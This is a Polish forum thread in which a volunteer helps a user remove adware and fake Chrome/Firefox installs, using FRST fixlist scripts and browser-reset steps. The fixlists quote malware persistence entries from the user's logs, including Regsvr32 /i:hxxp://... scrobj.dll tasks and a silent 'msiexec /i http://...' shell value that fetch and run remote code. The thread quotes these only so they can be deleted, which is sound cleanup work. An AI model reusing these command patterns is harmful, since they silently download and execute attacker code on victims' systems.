amanaskin Opublikowano 28 Maja 2017 Zgłoś Udostępnij Opublikowano 28 Maja 2017 Dzień dobry, znalazłem forum w internecie, podczas szukania rozwiązania usunięcia trojanów z komputera. Przez ostatni miesiąc mam problem z przeglądarką chrome i firefoxem - zamiast przeglądarki chrome ustawiają mi się dziwne strony, a dodatkowo co jakiś czas instalują się skróty na pulpicie Big_Farm itp. Przeglądają forum wykonałem czynności, które pojawiają się przy każdym wątku. Poniżej załączam raporty z AdwCleaner, FRST i Gmer. Proszę o pomoc w oczyszczeniu dysku z wirusów. Z góry dziękuję za zainteresowanie i wszelką pomoc Addition.txt AdwCleanerC0.txt FRST.txt gmer.txt Odnośnik do komentarza
Miszel03 Opublikowano 28 Maja 2017 Zgłoś Udostępnij Opublikowano 28 Maja 2017 Przeglądają forum wykonałem czynności, które pojawiają się przy każdym wątku. Poniżej załączam raporty z AdwCleaner, FRST i Gmer. Proszę o pomoc w oczyszczeniu dysku z wirusów. Nie zapożyczaj działań z innych tematów, bo to może się źle skończyć. P.S: Pomijam brak raportu Shortcut, choć nie wolno mi tego robić. W następnym poście obowiązkowo go oczekuję. Widać infekcje adware oraz fałszywe przeglądarki. Szybko się z tym uporamy. Portale z oprogramowaniem / Instalatory - na co uważać 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {AA2F5AA1-E61F-42A6-B2D2-82908FC1C595} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8xMWlYOWIdN8FcFTFyOThQNWzSNjF8MkQWNdY4FTzWNq== scrobj.dll Task: {CAAE5885-CF5C-4396-B2CB-351343F4F421} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8xMWlYOWIdN8FcFTFyOThQNWzSNjF8MkQWNdY4FTzWNq== scrobj.dll FirewallRules: [{CD91FEC5-B909-455D-BFA6-F2D988878524}] => (Allow) C:\Program Files (x86)\Everness\Application\chrome.exe FirewallRules: [{2184EBA4-E346-4471-B4F3-A76A961E90B9}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{F884D972-202D-4742-9811-8E5A129B9050}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Everness RemoveDirectory: C:\Users\Michał\AppData\Local\Everness RemoveDirectory: C:\Users\Michal\AppData\Roaming\Everness RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Michał\AppData\Local\Firefox RemoveDirectory: C:\Users\Michal\AppData\Roaming\Firefox HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-2511481870-1426507333-4213709584-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8xMWlYOWIdN8FcFTFyOThQNWzSNjF8MkQWNdY4FTzWNq== /q IFEO\DisplaySwitch.exe: [Debugger] IFEO\taskmgr.exe: [Debugger] HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = S3 dbx; system32\DRIVERS\dbx.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] RemoveDirectory: C:\Program Files (x86)\Elex-tech EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarki. Google Chrome Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin Ustaw jakąkolwiek zaufaną przeglądarkę jako domyślną, najlepiej Google Chrome. To wymagany krok to kasacji modyfikacji infekcji. Mozilla FireFox Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 3. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). everness;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 4. Upewnij się, że AdwCleaner już niczego nie wykrywa. Ewentualne detekcję daj do kasacji. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
amanaskin Opublikowano 28 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 28 Maja 2017 (edytowane) Dzięki za pomoc ! w załączniku przesyłam pliki o które prosisz. Adwcleaner nie wykrył zagrożeń. SearchReg.txt Fixlog.txt Addition.txt Shortcut.txt Edytowane 29 Maja 2017 przez Rucek Odnośnik do komentarza
Miszel03 Opublikowano 29 Maja 2017 Zgłoś Udostępnij Opublikowano 29 Maja 2017 A gdzie raport FRST? Odnośnik do komentarza
amanaskin Opublikowano 30 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 30 Maja 2017 Raport FRST w załączniku FRST.txt Addition.txt Shortcut.txt Odnośnik do komentarza
Miszel03 Opublikowano 31 Maja 2017 Zgłoś Udostępnij Opublikowano 31 Maja 2017 Wygląda to już w porządku. Poprawki: 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Everness DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Everness] "path"="C:\Program Files (x86)\Everness\ DeleteKey: HKEY_USERS\S-1-5-21-2511481870-1426507333-4213709584-1000\Software\Everness DeleteKey: HKEY_USERS\S-1-5-21-2511481870-1426507333-4213709584-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\39973f75_0 ""="{0.0.0.00000000}.{ad291970-153d-483e-873e-ccbe8bb3130f} \Device\HarddiskVolume2\Program Files (x86)\Everness\Application\chrome.exe%b{00000000-0000-0000-0000-000000000000} DeleteKey: HKEY_USERS\S-1-5-21-2511481870-1426507333-4213709584-1000\Software\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe ""="C:\Program Files (x86)\Everness\Application\chrome.exe DeleteKey: HKEY_USERS\S-1-5-21-2511481870-1426507333-4213709584-1000\Software\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe "Path"="C:\Program Files (x86)\Everness\Application HKEY_USERS\S-1-5-21-2511481870-1426507333-4213709584-1000\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache "C:\Program Files (x86)\Everness\Application\chrome.exe"="Google Chrome Reboot: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Dostarcz plik Fixlog i podsumuj obecny stan systemu. Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się